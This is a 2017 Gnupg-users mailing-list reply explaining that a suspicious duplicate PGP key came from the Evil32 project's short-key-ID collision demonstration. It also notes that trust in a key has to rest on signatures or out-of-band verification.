suspicious key found

Andrew Gallagher andrewg at andrewg.com
Tue May 16 17:28:23 CEST 2017


On 2017/05/16 14:47, Janne Inkilä wrote:
> Did someone really generated same looking key? And why? Any ideas?

Yes, they did. Most of the strong set was duplicated by the Evil32
project in order to demonstrate the danger of relying on short key IDs
(because on modern hardware it takes mere seconds to generate a fake key
with the same short ID). Unfortunately the fake keys got uploaded to an
SKS server and polluted the database. The authors then mass-revoked all
the offending keys, but since SKS is append-only they still appear in
search results.

https://evil32.com/

The fact that invalid (even suspicious) keys exist on the SKS servers
(or anywhere on the internet for that matter) is in itself not a problem
- any decent public-key infrastructure must be designed under the
assumption that forgeries are inevitable and use some other method
(signatures, out of band verification) to determine the validity of keys.

The moral of the story is: don't believe everything you see on the
internet. ;-)

Andrew.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 801 bytes
Desc: OpenPGP digital signature
URL: </pipermail/attachments/20170516/b85362d0/attachment-0001.sig>


More information about the Gnupg-users mailing list